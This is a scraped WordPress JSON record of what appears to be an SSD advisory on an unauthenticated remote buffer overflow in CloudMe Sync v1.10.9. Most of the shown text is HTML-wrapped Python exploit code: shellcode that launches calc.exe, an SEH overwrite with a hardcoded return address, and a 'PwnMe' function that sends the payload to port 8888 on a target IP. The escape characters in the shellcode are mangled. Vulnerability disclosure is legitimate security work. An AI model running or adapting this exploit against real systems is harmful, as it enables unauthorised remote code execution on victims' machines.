class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a80c16202d4b112194257-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c16202d4b112194257-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c16202d4b112194257-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c16202d4b112194257-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c16202d4b112194257-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c16202d4b112194257-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c16202d4b112194257-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c16202d4b112194257-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c16202d4b112194257-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c16202d4b112194257-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c16202d4b112194257-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c16202d4b112194257-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c16202d4b112194257-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c16202d4b112194257-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c16202d4b112194257-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c16202d4b112194257-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c16202d4b112194257-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c16202d4b112194257-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c16202d4b112194257-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c16202d4b112194257-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c16202d4b112194257-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c16202d4b112194257-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c16202d4b112194257-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c16202d4b112194257-24\">24<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c16202d4b112194257-25\">25<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c16202d4b112194257-26\">26<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c16202d4b112194257-27\">27<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c16202d4b112194257-28\">28<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c16202d4b112194257-29\">29<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c16202d4b112194257-30\">30<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c16202d4b112194257-31\">31<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c16202d4b112194257-32\">32<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c16202d4b112194257-33\">33<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a80c16202d4b112194257-34\">34<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a80c16202d4b112194257-35\">35<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-1\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">socket<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-t\">struct<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-2\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-3\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;CloudMe Sync v1.10.9&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-4\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Unauthenticated Remote Buffer Overflow 0day&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-5\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Discovery\/credits: hyp3rlinx&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-6\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;apparition securityn&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-7\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-8\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-9\"><span class=\"crayon-p\">#shellcode to pop calc.exe Windows 7 SP1<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-10\"><span class=\"crayon-v\">sc<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;x31xF6x56x64x8Bx76x30x8Bx76x0Cx8Bx76x1Cx8B&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-11\"><span class=\"crayon-s\">&#8220;x6Ex08x8Bx36x8Bx5Dx3Cx8Bx5Cx1Dx78x01xEBx8B&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-12\"><span class=\"crayon-s\">&#8220;x4Bx18x8Bx7Bx20x01xEFx8Bx7Cx8FxFCx01xEFx31&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-13\"><span class=\"crayon-s\">&#8220;xC0x99x32x17x66xC1xCAx01xAEx75xF7x66x81xFA&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-14\"><span class=\"crayon-s\">&#8220;x10xF5xE0xE2x75xCFx8Bx53x24x01xEAx0FxB7x14&#8221;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-15\"><span class=\"crayon-s\">&#8220;x4Ax8Bx7Bx1Cx01xEFx03x2Cx97x68x2Ex65x78x65&#8221;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-16\"><span class=\"crayon-s\">&#8220;x68x63x61x6Cx63x54x87x04x24x50xFFxD5xCC&#8221;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-17\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-18\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-19\"><span class=\"crayon-v\">ip<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-e\">raw_input<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;[+] CloudMe Target IP&gt; &#8216;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-20\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-21\"><span class=\"crayon-v\">nseh<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;xEBx06&#8221;<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;x90&#8221;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\">#JMP<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-22\"><span class=\"crayon-v\">seh<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-t\">struct<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">pack<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;&lt;L&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">0x61e7b7f6<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-p\">#POP,POP RET <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-23\"><span class=\"crayon-v\">junk<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;A&#8221;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-cn\">2232<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">nseh<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">seh<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">sc<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-s\">&#8220;B&#8221;<\/span><span class=\"crayon-o\">*<\/span><span class=\"crayon-cn\">5600<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-24\"><span class=\"crayon-v\">payload<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">junk<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">nseh<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-v\">seh<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-e\">sc<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-25\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-26\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">PwnMe<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-27\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">socket<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">socket<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">socket<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">AF_INET<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">socket<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">SOCK_STREAM<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-28\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">connect<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-cn\">8888<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-29\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">s<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">send<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-30\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Sending buffer overflow packetz&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-31\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">raw_input<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-32\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-33\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a80c16202d4b112194257-34\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">__name__<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;__main__&#8217;<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a80c16202d4b112194257-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">PwnMe<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">ip<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-v\">payload<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0036 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3669\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Noam Rathaus| Date: Sun, 11 Feb 2018 07:06:24 +0000<\/strong><\/p>\n<p>The following advisory describes one (1) vulnerability found in CloudMe. CloudMe is &#8220;a file storage service operated by CloudMe AB that offers cloud storage, file synchronization and client software. It features a blue folder that appears on all devices with the same content, all files are synchronized between devices.&#8221; The vulnerability found is a buffer &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3669\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory &#8211; CloudMe Unauthenticated Remote Buffer Overflow<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[12033,11851,10757,12136],"class_list":["post-11440","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-buffer-overflow","tag-remote-command-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11440","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=11440"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11440\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=11440"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=11440"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=11440"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}